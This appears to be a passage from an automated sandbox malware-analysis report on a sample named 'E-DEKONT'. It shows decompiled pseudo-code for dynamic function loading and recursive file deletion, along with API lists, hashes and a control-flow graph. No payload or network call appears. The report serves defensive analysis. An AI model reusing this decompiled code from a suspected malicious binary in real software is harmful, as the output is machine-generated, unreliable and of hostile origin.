                                                                            										__ecx = _v24;
                                                                            										__edi = _v12;
                                                                            										while(1) {
                                                                            											__edi = __edi + 1;
                                                                            											__edi = __edi + 1;
                                                                            											_v12 = __edi;
                                                                            											__ax =  *__edi;
                                                                            											__eflags = __ax - __dx;
                                                                            											if(__ax != __dx) {
                                                                            												goto L116;
                                                                            											}
                                                                            											L115:
                                                                            											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                            											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                            												L120:
                                                                            												 *__ecx =  *__ecx & 0x00000000;
                                                                            												__ebx = E1000122C(_v24);
                                                                            												goto L91;
                                                                            											}
                                                                            											L116:
                                                                            											__eflags = __ax;
                                                                            											if(__ax == 0) {
                                                                            												goto L120;
                                                                            											}
                                                                            											__eflags = __ax - __dx;
                                                                            											if(__ax == __dx) {
                                                                            												__edi = __edi + 1;
                                                                            												__edi = __edi + 1;
                                                                            												__eflags = __edi;
                                                                            											}
                                                                            											__ax =  *__edi;
                                                                            											 *__ecx =  *__edi;
                                                                            											__ecx = __ecx + 1;
                                                                            											__ecx = __ecx + 1;
                                                                            											__edi = __edi + 1;
                                                                            											__edi = __edi + 1;
                                                                            											_v12 = __edi;
                                                                            											__ax =  *__edi;
                                                                            											__eflags = __ax - __dx;
                                                                            											if(__ax != __dx) {
                                                                            												goto L116;
                                                                            											}
                                                                            											goto L115;
                                                                            										}
                                                                            									case 1:
                                                                            										_v8 = 1;
                                                                            										goto L61;
                                                                            									case 2:
                                                                            										_v8 = _v8 | 0xffffffff;
                                                                            										goto L61;
                                                                            									case 3:
                                                                            										_v8 = _v8 & 0x00000000;
                                                                            										_v20 = _v20 & 0x00000000;
                                                                            										_v16 = _v16 + 1;
                                                                            										goto L79;
                                                                            									case 4:
                                                                            										__eflags = _v20;
                                                                            										if(_v20 != 0) {
                                                                            											goto L61;
                                                                            										}
                                                                            										_v12 = _v12 - 2;
                                                                            										__ebx = E1000121B();
                                                                            										 &_v12 = E10001A9F( &_v12);
                                                                            										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                                            										goto L91;
                                                                            									case 5:
                                                                            										L99:
                                                                            										_v20 = _v20 + 1;
                                                                            										goto L61;
                                                                            									case 6:
                                                                            										_push(7);
                                                                            										goto L107;
                                                                            									case 7:
                                                                            										_push(0x19);
                                                                            										goto L127;
                                                                            									case 8:
                                                                            										_push(0x15);
                                                                            										goto L127;
                                                                            									case 9:
                                                                            										_push(0x16);
                                                                            										goto L127;
                                                                            									case 0xa:
                                                                            										_push(0x18);
                                                                            										goto L127;
                                                                            									case 0xb:
                                                                            										_push(5);
                                                                            										goto L107;
                                                                            									case 0xc:
                                                                            										__eax = 0;
                                                                            										__eax = 1;
                                                                            										goto L85;
                                                                            									case 0xd:
                                                                            										_push(6);
                                                                            										goto L107;
                                                                            									case 0xe:
                                                                            										_push(2);
                                                                            										goto L107;
                                                                            									case 0xf:
                                                                            										_push(3);
                                                                            										goto L107;
                                                                            									case 0x10:
                                                                            										_push(0x17);
                                                                            										L127:
                                                                            										_pop(__ebx);
                                                                            										goto L92;
                                                                            									case 0x11:
                                                                            										__eax =  &_v12;
                                                                            										__eax = E10001A9F( &_v12);
                                                                            										__ebx = __eax;
                                                                            										__ebx = __eax + 1;
                                                                            										__eflags = __ebx - 0xb;
                                                                            										if(__ebx < 0xb) {
                                                                            											__ebx = __ebx + 0xa;
                                                                            										}
                                                                            										goto L91;
                                                                            									case 0x12:
                                                                            										__ebx = 0xffffffff;
                                                                            										goto L92;
                                                                            									case 0x13:
                                                                            										_v48 = _v48 + 1;
                                                                            										_push(4);
                                                                            										_pop(__eax);
                                                                            										goto L85;
                                                                            									case 0x14:
                                                                            										__eax = 0;
                                                                            										__eflags = 0;
                                                                            										goto L85;
                                                                            									case 0x15:
                                                                            										_push(4);
                                                                            										L107:
                                                                            										_pop(__eax);
                                                                            										L85:
                                                                            										__edi = _v16;
                                                                            										__ecx =  *(0x1000305c + __eax * 4);
                                                                            										__edi = _v16 << 5;
                                                                            										__edx = 0;
                                                                            										__edi = (_v16 << 5) + __esi;
                                                                            										__edx = 1;
                                                                            										__eflags = _v8 - 0xffffffff;
                                                                            										_v40 = 1;
                                                                            										 *(__edi + 0x1018) = __eax;
                                                                            										if(_v8 == 0xffffffff) {
                                                                            											L87:
                                                                            											__ecx = __edx;
                                                                            											L88:
                                                                            											__eflags = _v8 - __edx;
                                                                            											 *(__edi + 0x1028) = __ecx;
                                                                            											if(_v8 == __edx) {
                                                                            												__eax =  &_v12;
                                                                            												__eax = E10001A9F( &_v12);
                                                                            												__eax = __eax + 1;
                                                                            												__eflags = __eax;
                                                                            												_v8 = __eax;
                                                                            											}
                                                                            											__eax = _v8;
                                                                            											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                            											_t133 = _v16 + 0x81; // 0x81
                                                                            											_t133 = _t133 << 5;
                                                                            											__eax = 0;
                                                                            											__eflags = 0;
                                                                            											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                                            											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                            											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                            											goto L91;
                                                                            										}
                                                                            										__eflags = __ecx;
                                                                            										if(__ecx > 0) {
                                                                            											goto L88;
                                                                            										}
                                                                            										goto L87;
                                                                            									case 0x16:
                                                                            										_t262 =  *(_t319 + 0x1014);
                                                                            										__eflags = _t262 - _v16;
                                                                            										if(_t262 > _v16) {
                                                                            											_v16 = _t262;
                                                                            										}
                                                                            										_v8 = _v8 & 0x00000000;
                                                                            										_v20 = _v20 & 0x00000000;
                                                                            										_v36 - 3 = _t262 - (_v36 == 3);
                                                                            										if(_t262 != _v36 == 3) {
                                                                            											L79:
                                                                            											_v40 = 1;
                                                                            										}
                                                                            										goto L61;
                                                                            									case 0x17:
                                                                            										__eax =  &_v12;
                                                                            										__eax = E10001A9F( &_v12);
                                                                            										__ebx = __eax;
                                                                            										__ebx = __eax + 1;
                                                                            										L91:
                                                                            										__eflags = __ebx;
                                                                            										if(__ebx == 0) {
                                                                            											goto L61;
                                                                            										}
                                                                            										L92:
                                                                            										__eflags = _v20;
                                                                            										_v40 = 1;
                                                                            										if(_v20 != 0) {
                                                                            											L97:
                                                                            											__eflags = _v20 - 1;
                                                                            											if(_v20 == 1) {
                                                                            												__eax = _v16;
                                                                            												__eax = _v16 << 5;
                                                                            												__eflags = __eax;
                                                                            												 *(__eax + __esi + 0x102c) = __ebx;
                                                                            											}
                                                                            											goto L99;
                                                                            										}
                                                                            										_v16 = _v16 << 5;
                                                                            										_t141 = __esi + 0x1030; // 0x1030
                                                                            										__edi = (_v16 << 5) + _t141;
                                                                            										__eax =  *__edi;
                                                                            										__eflags = __eax - 0xffffffff;
                                                                            										if(__eax <= 0xffffffff) {
                                                                            											L95:
                                                                            											__eax = GlobalFree(__eax);
                                                                            											L96:
                                                                            											 *__edi = __ebx;
                                                                            											goto L97;
                                                                            										}
                                                                            										__eflags = __eax - 0x19;
                                                                            										if(__eax <= 0x19) {
                                                                            											goto L96;
                                                                            										}
                                                                            										goto L95;
                                                                            									case 0x18:
                                                                            										goto L61;
                                                                            								}
                                                                            							}
                                                                            							_t263 = _t259 - 1;
                                                                            							__eflags = _t263;
                                                                            							if(_t263 == 0) {
                                                                            								_v16 = _t284;
                                                                            								goto L74;
                                                                            							}
                                                                            							__eflags = _t263 != 1;
                                                                            							if(_t263 != 1) {
                                                                            								goto L141;
                                                                            							}
                                                                            							_t266 = _t287 - 0x21;
                                                                            							__eflags = _t266;
                                                                            							if(_t266 == 0) {
                                                                            								_v8 =  ~_v8;
                                                                            								goto L61;
                                                                            							}
                                                                            							_t267 = _t266 - 0x42;
                                                                            							__eflags = _t267;
                                                                            							if(_t267 == 0) {
                                                                            								L57:
                                                                            								__eflags = _v8 - 1;
                                                                            								if(_v8 != 1) {
                                                                            									_t92 = _t319 + 0x1010;
                                                                            									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                                                            									__eflags =  *_t92;
                                                                            								} else {
                                                                            									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                                                            								}
                                                                            								_v8 = 1;
                                                                            								goto L61;
                                                                            							}
                                                                            							_t272 = _t267;
                                                                            							__eflags = _t272;
                                                                            							if(_t272 == 0) {
                                                                            								_push(0x20);
                                                                            								L56:
                                                                            								_pop(1);
                                                                            								goto L57;
                                                                            							}
                                                                            							_t273 = _t272 - 9;
                                                                            							__eflags = _t273;
                                                                            							if(_t273 == 0) {
                                                                            								_push(8);
                                                                            								goto L56;
                                                                            							}
                                                                            							_t274 = _t273 - 4;
                                                                            							__eflags = _t274;
                                                                            							if(_t274 == 0) {
                                                                            								_push(4);
                                                                            								goto L56;
                                                                            							}
                                                                            							_t275 = _t274 - 1;
                                                                            							__eflags = _t275;
                                                                            							if(_t275 == 0) {
                                                                            								_push(0x10);
                                                                            								goto L56;
                                                                            							}
                                                                            							__eflags = _t275 != 0;
                                                                            							if(_t275 != 0) {
                                                                            								goto L61;
                                                                            							}
                                                                            							_push(0x40);
                                                                            							goto L56;
                                                                            						}
                                                                            						goto L15;
                                                                            					}
                                                                            					_t278 = _t249 - 5;
                                                                            					if(_t278 == 0) {
                                                                            						__eflags = _v36 - 3;
                                                                            						_v32 = 1;
                                                                            						_v8 = _t284;
                                                                            						_v20 = _t284;
                                                                            						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                            						_v40 = _t284;
                                                                            						goto L17;
                                                                            					}
                                                                            					_t282 = _t278 - 1;
                                                                            					if(_t282 == 0) {
                                                                            						_v32 = 2;
                                                                            						_v8 = _t284;
                                                                            						_v20 = _t284;
                                                                            						goto L17;
                                                                            					}
                                                                            					if(_t282 != 0x16) {
                                                                            						goto L40;
                                                                            					} else {
                                                                            						_v32 = 3;
                                                                            						_v8 = 1;
                                                                            						goto L17;
                                                                            					}
                                                                            				}
                                                                            				GlobalFree(_v52);
                                                                            				GlobalFree(_v24);
                                                                            				GlobalFree(_v44);
                                                                            				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                                                            					L161:
                                                                            					return _t319;
                                                                            				} else {
                                                                            					_t216 =  *_t319 - 1;
                                                                            					if(_t216 == 0) {
                                                                            						_t178 = _t319 + 8; // 0x8
                                                                            						_t312 = _t178;
                                                                            						__eflags =  *_t312 - _t284;
                                                                            						if( *_t312 != _t284) {
                                                                            							_t217 = GetModuleHandleW(_t312);
                                                                            							__eflags = _t217 - _t284;
                                                                            							 *(_t319 + 0x1008) = _t217;
                                                                            							if(_t217 != _t284) {
                                                                            								L150:
                                                                            								_t183 = _t319 + 0x808; // 0x808
                                                                            								_t313 = _t183;
                                                                            								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                                                            								__eflags = _t218 - _t284;
                                                                            								 *(_t319 + 0x100c) = _t218;
                                                                            								if(_t218 == _t284) {
                                                                            									__eflags =  *_t313 - 0x23;
                                                                            									if( *_t313 == 0x23) {
                                                                            										_t186 = _t319 + 0x80a; // 0x80a
                                                                            										_t222 = E10001311(_t186);
                                                                            										__eflags = _t222 - _t284;
                                                                            										if(_t222 != _t284) {
                                                                            											__eflags = _t222 & 0xffff0000;
                                                                            											if((_t222 & 0xffff0000) == 0) {
                                                                            												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								__eflags = _v48 - _t284;
                                                                            								if(_v48 != _t284) {
                                                                            									L157:
                                                                            									_t313[lstrlenW(_t313)] = 0x57;
                                                                            									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                                                            									__eflags = _t220 - _t284;
                                                                            									if(_t220 != _t284) {
                                                                            										L145:
                                                                            										 *(_t319 + 0x100c) = _t220;
                                                                            										goto L161;
                                                                            									}
                                                                            									__eflags =  *(_t319 + 0x100c) - _t284;
                                                                            									L159:
                                                                            									if(__eflags != 0) {
                                                                            										goto L161;
                                                                            									}
                                                                            									L160:
                                                                            									_t197 = _t319 + 4;
                                                                            									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                                                            									__eflags =  *_t197;
                                                                            									goto L161;
                                                                            								} else {
                                                                            									__eflags =  *(_t319 + 0x100c) - _t284;
                                                                            									if( *(_t319 + 0x100c) != _t284) {
                                                                            										goto L161;
                                                                            									}
                                                                            									goto L157;
                                                                            								}
                                                                            							}
                                                                            							_t225 = LoadLibraryW(_t312);
                                                                            							__eflags = _t225 - _t284;
                                                                            							 *(_t319 + 0x1008) = _t225;
                                                                            							if(_t225 == _t284) {
                                                                            								goto L160;
                                                                            							}
                                                                            							goto L150;
                                                                            						}
                                                                            						_t179 = _t319 + 0x808; // 0x808
                                                                            						_t227 = E10001311(_t179);
                                                                            						 *(_t319 + 0x100c) = _t227;
                                                                            						__eflags = _t227 - _t284;
                                                                            						goto L159;
                                                                            					}
                                                                            					_t228 = _t216 - 1;
                                                                            					if(_t228 == 0) {
                                                                            						_t176 = _t319 + 0x808; // 0x808
                                                                            						_t229 = _t176;
                                                                            						__eflags =  *_t229 - _t284;
                                                                            						if( *_t229 == _t284) {
                                                                            							goto L161;
                                                                            						}
                                                                            						_t220 = E10001311(_t229);
                                                                            						L144:
                                                                            						goto L145;
                                                                            					}
                                                                            					if(_t228 != 1) {
                                                                            						goto L161;
                                                                            					}
                                                                            					_t80 = _t319 + 8; // 0x8
                                                                            					_t285 = _t80;
                                                                            					_t314 = E10001311(_t80);
                                                                            					 *(_t319 + 0x1008) = _t314;
                                                                            					if(_t314 == 0) {
                                                                            						goto L160;
                                                                            					}
                                                                            					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                                                            					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                                                            					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                                                            					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                                                            					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                                                            					_t89 = _t319 + 0x808; // 0x808
                                                                            					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                                                            					goto L144;
                                                                            				}
                                                                            			}
































































                                                                            0x10001bd3
                                                                            0x10001bd8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001bda
                                                                            0x10001bdd
                                                                            0x10001ced
                                                                            0x10001cf0
                                                                            0x10001cf0
                                                                            0x10001cf2
                                                                            0x10002048
                                                                            0x1000204b
                                                                            0x100020b2
                                                                            0x10001d60
                                                                            0x10001d63
                                                                            0x10001d66
                                                                            0x10001d69
                                                                            0x10001d69
                                                                            0x10001d6b
                                                                            0x10001d6c
                                                                            0x10001d6c
                                                                            0x10001d6d
                                                                            0x00000000
                                                                            0x10001d6d
                                                                            0x1000204d
                                                                            0x10002050
                                                                            0x10002057
                                                                            0x10002057
                                                                            0x1000205b
                                                                            0x1000206f
                                                                            0x1000206f
                                                                            0x10002072
                                                                            0x10002076
                                                                            0x100020be
                                                                            0x100020c1
                                                                            0x100020c5
                                                                            0x00000000
                                                                            0x100020c5
                                                                            0x10002078
                                                                            0x1000207c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1000207e
                                                                            0x10002085
                                                                            0x10002085
                                                                            0x1000208b
                                                                            0x1000208e
                                                                            0x100020aa
                                                                            0x10002090
                                                                            0x10002099
                                                                            0x1000209c
                                                                            0x1000209c
                                                                            0x00000000
                                                                            0x1000208e
                                                                            0x1000205d
                                                                            0x10002060
                                                                            0x10002064
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002066
                                                                            0x00000000
                                                                            0x10002066
                                                                            0x10002052
                                                                            0x10002055
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002055
                                                                            0x10001cf8
                                                                            0x10001cf8
                                                                            0x10001cf9
                                                                            0x10001e29
                                                                            0x10001e29
                                                                            0x10001e2e
                                                                            0x10001e31
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001e3e
                                                                            0x00000000
                                                                            0x10001fe5
                                                                            0x10001fe8
                                                                            0x10001feb
                                                                            0x10001feb
                                                                            0x10001fec
                                                                            0x10001fed
                                                                            0x10001ff0
                                                                            0x10001ff3
                                                                            0x10001ff6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001ff8
                                                                            0x10001ff8
                                                                            0x10001ffc
                                                                            0x10002014
                                                                            0x10002017
                                                                            0x10002021
                                                                            0x00000000
                                                                            0x10002021
                                                                            0x10001ffe
                                                                            0x10001ffe
                                                                            0x10002001
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002003
                                                                            0x10002006
                                                                            0x10002008
                                                                            0x10002009
                                                                            0x10002009
                                                                            0x10002009
                                                                            0x1000200a
                                                                            0x1000200d
                                                                            0x10002010
                                                                            0x10002011
                                                                            0x10001feb
                                                                            0x10001fec
                                                                            0x10001fed
                                                                            0x10001ff0
                                                                            0x10001ff3
                                                                            0x10001ff6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001ff6
                                                                            0x00000000
                                                                            0x10001e85
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001e91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001e78
                                                                            0x10001e7c
                                                                            0x10001e80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001fb6
                                                                            0x10001fba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001fc0
                                                                            0x10001fc9
                                                                            0x10001fd0
                                                                            0x10001fd8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f53
                                                                            0x10001f53
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001e9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002040
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002030
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002034
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1000203c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f76
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f5b
                                                                            0x10001f5d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f7e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f63
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002038
                                                                            0x10002042
                                                                            0x10002042
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f86
                                                                            0x10001f8a
                                                                            0x10001f8f
                                                                            0x10001f92
                                                                            0x10001f93
                                                                            0x10001f96
                                                                            0x10001f9c
                                                                            0x10001f9c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002028
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f6b
                                                                            0x10001f6e
                                                                            0x10001f70
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001ea1
                                                                            0x10001ea1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f7a
                                                                            0x10001f80
                                                                            0x10001f80
                                                                            0x10001ea3
                                                                            0x10001ea3
                                                                            0x10001ea6
                                                                            0x10001ead
                                                                            0x10001eb0
                                                                            0x10001eb2
                                                                            0x10001eb4
                                                                            0x10001eb5
                                                                            0x10001eb9
                                                                            0x10001ebc
                                                                            0x10001ec2
                                                                            0x10001ec8
                                                                            0x10001ec8
                                                                            0x10001eca
                                                                            0x10001eca
                                                                            0x10001ecd
                                                                            0x10001ed3
                                                                            0x10001ed5
                                                                            0x10001ed9
                                                                            0x10001ede
                                                                            0x10001ede
                                                                            0x10001ee0
                                                                            0x10001ee0
                                                                            0x10001ee3
                                                                            0x10001ee6
                                                                            0x10001eef
                                                                            0x10001ef5
                                                                            0x10001ef8
                                                                            0x10001ef8
                                                                            0x10001efa
                                                                            0x10001efd
                                                                            0x10001f03
                                                                            0x00000000
                                                                            0x10001f03
                                                                            0x10001ec4
                                                                            0x10001ec6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001e45
                                                                            0x10001e4b
                                                                            0x10001e4e
                                                                            0x10001e50
                                                                            0x10001e50
                                                                            0x10001e53
                                                                            0x10001e57
                                                                            0x10001e64
                                                                            0x10001e66
                                                                            0x10001e6c
                                                                            0x10001e6c
                                                                            0x10001e6c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001fa4
                                                                            0x10001fa8
                                                                            0x10001fad
                                                                            0x10001fb0
                                                                            0x10001f09
                                                                            0x10001f09
                                                                            0x10001f0b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001f11
                                                                            0x10001f11
                                                                            0x10001f15
                                                                            0x10001f1c
                                                                            0x10001f40
                                                                            0x10001f40
                                                                            0x10001f44
                                                                            0x10001f46
                                                                            0x10001f49
                                                                            0x10001f49
                                                                            0x10001f4c
                                                                            0x10001f4c
                                                                            0x00000000
                                                                            0x10001f44
                                                                            0x10001f21
                                                                            0x10001f24
                                                                            0x10001f24
                                                                            0x10001f2b
                                                                            0x10001f2d
                                                                            0x10001f30
                                                                            0x10001f37
                                                                            0x10001f38
                                                                            0x10001f3e
                                                                            0x10001f3e
                                                                            0x00000000
                                                                            0x10001f3e
                                                                            0x10001f32
                                                                            0x10001f35
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001e3e
                                                                            0x10001cff
                                                                            0x10001cff
                                                                            0x10001d00
                                                                            0x10001e26
                                                                            0x00000000
                                                                            0x10001e26
                                                                            0x10001d06
                                                                            0x10001d07
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001d0f
                                                                            0x10001d0f
                                                                            0x10001d12
                                                                            0x10001d5d

                                                                            APIs
                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                                            • String ID:
                                                                            • API String ID: 4227406936-0
                                                                            • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                            • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 706 405990-4059b6 call 405c5b 709 4059b8-4059ca DeleteFileW 706->709 710 4059cf-4059d6 706->710 711 405b4c-405b50 709->711 712 4059d8-4059da 710->712 713 4059e9-4059f9 call 406282 710->713 714 4059e0-4059e3 712->714 715 405afa-405aff 712->715 719 405a08-405a09 call 405b9f 713->719 720 4059fb-405a06 lstrcatW 713->720 714->713 714->715 715->711 718 405b01-405b04 715->718 721 405b06-405b0c 718->721 722 405b0e-405b16 call 4065c5 718->722 723 405a0e-405a12 719->723 720->723 721->711 722->711 730 405b18-405b2c call 405b53 call 405948 722->730 726 405a14-405a1c 723->726 727 405a1e-405a24 lstrcatW 723->727 726->727 729 405a29-405a45 lstrlenW FindFirstFileW 726->729 727->729 731 405a4b-405a53 729->731 732 405aef-405af3 729->732 746 405b44-405b47 call 4052e6 730->746 747 405b2e-405b31 730->747 736 405a73-405a87 call 406282 731->736 737 405a55-405a5d 731->737 732->715 735 405af5 732->735 735->715 748 405a89-405a91 736->748 749 405a9e-405aa9 call 405948 736->749 740 405ad2-405ae2 FindNextFileW 737->740 741 405a5f-405a67 737->741 740->731 745 405ae8-405ae9 FindClose 740->745 741->736 742 405a69-405a71 741->742 742->736 742->740 745->732 746->711 747->721 750 405b33-405b42 call 4052e6 call 406048 747->750 748->740 751 405a93-405a9c call 405990 748->751 759 405aca-405acd call 4052e6 749->759 760 405aab-405aae 749->760 750->711 751->740 759->740 763 405ab0-405ac0 call 4052e6 call 406048 760->763 764 405ac2-405ac8 760->764 763->740 764->740
                                                                            C-Code - Quality: 98%
                                                                            			E00405990(void* __eflags, signed int _a4, signed int _a8) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				short _v556;
                                                                            				short _v558;
                                                                            				struct _WIN32_FIND_DATAW _v604;
                                                                            				signed int _t38;
                                                                            				signed int _t52;
                                                                            				signed int _t55;
                                                                            				signed int _t62;
                                                                            				void* _t64;
                                                                            				signed char _t65;
                                                                            				WCHAR* _t66;
                                                                            				void* _t67;
                                                                            				WCHAR* _t68;
                                                                            				void* _t70;
                                                                            
                                                                            				_t65 = _a8;
                                                                            				_t68 = _a4;
                                                                            				_v8 = _t65 & 0x00000004;
                                                                            				_t38 = E00405C5B(__eflags, _t68);
                                                                            				_v12 = _t38;
                                                                            				if((_t65 & 0x00000008) != 0) {
                                                                            					_t62 = DeleteFileW(_t68); // executed
                                                                            					asm("sbb eax, eax");
                                                                            					_t64 =  ~_t62 + 1;
                                                                            					 *0x434f88 =  *0x434f88 + _t64;
                                                                            					return _t64;
                                                                            				}
                                                                            				_a4 = _t65;
                                                                            				_t8 =  &_a4;
                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                            				__eflags =  *_t8;
                                                                            				if( *_t8 == 0) {
                                                                            					L5:
                                                                            					E00406282(0x42f250, _t68);
                                                                            					__eflags = _a4;
                                                                            					if(_a4 == 0) {
                                                                            						E00405B9F(_t68);
                                                                            					} else {
                                                                            						lstrcatW(0x42f250, L"\\*.*");
                                                                            					}
                                                                            					__eflags =  *_t68;
                                                                            					if( *_t68 != 0) {
                                                                            						L10:
                                                                            						lstrcatW(_t68, 0x40a014);
                                                                            						L11:
                                                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                            						_t38 = FindFirstFileW(0x42f250,  &_v604); // executed
                                                                            						_t70 = _t38;
                                                                            						__eflags = _t70 - 0xffffffff;
                                                                            						if(_t70 == 0xffffffff) {
                                                                            							L26:
                                                                            							__eflags = _a4;
                                                                            							if(_a4 != 0) {
                                                                            								_t30 = _t66 - 2;
                                                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                            								__eflags =  *_t30;
                                                                            							}
                                                                            							goto L28;
                                                                            						} else {
                                                                            							goto L12;
                                                                            						}
                                                                            						do {
                                                                            							L12:
                                                                            							__eflags = _v604.cFileName - 0x2e;
                                                                            							if(_v604.cFileName != 0x2e) {
                                                                            								L16:
                                                                            								E00406282(_t66,  &(_v604.cFileName));
                                                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                            								if(__eflags == 0) {
                                                                            									_t52 = E00405948(__eflags, _t68, _v8);
                                                                            									__eflags = _t52;
                                                                            									if(_t52 != 0) {
                                                                            										E004052E6(0xfffffff2, _t68);
                                                                            									} else {
                                                                            										__eflags = _v8 - _t52;
                                                                            										if(_v8 == _t52) {
                                                                            											 *0x434f88 =  *0x434f88 + 1;
                                                                            										} else {
                                                                            											E004052E6(0xfffffff1, _t68);
                                                                            											E00406048(_t67, _t68, 0);
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                            									if(__eflags == 0) {
                                                                            										E00405990(__eflags, _t68, _a8);
                                                                            									}
                                                                            								}
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _v558;
                                                                            							if(_v558 == 0) {
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _v558 - 0x2e;
                                                                            							if(_v558 != 0x2e) {
                                                                            								goto L16;
                                                                            							}
                                                                            							__eflags = _v556;
                                                                            							if(_v556 == 0) {
                                                                            								goto L24;
                                                                            							}
                                                                            							goto L16;
                                                                            							L24:
                                                                            							_t55 = FindNextFileW(_t70,  &_v604);
                                                                            							__eflags = _t55;
                                                                            						} while (_t55 != 0);
                                                                            						_t38 = FindClose(_t70);
                                                                            						goto L26;
                                                                            					}
                                                                            					__eflags =  *0x42f250 - 0x5c;
                                                                            					if( *0x42f250 != 0x5c) {
                                                                            						goto L11;
                                                                            					}
                                                                            					goto L10;
                                                                            				} else {
                                                                            					__eflags = _t38;
                                                                            					if(_t38 == 0) {
                                                                            						L28:
                                                                            						__eflags = _a4;
                                                                            						if(_a4 == 0) {
                                                                            							L36:
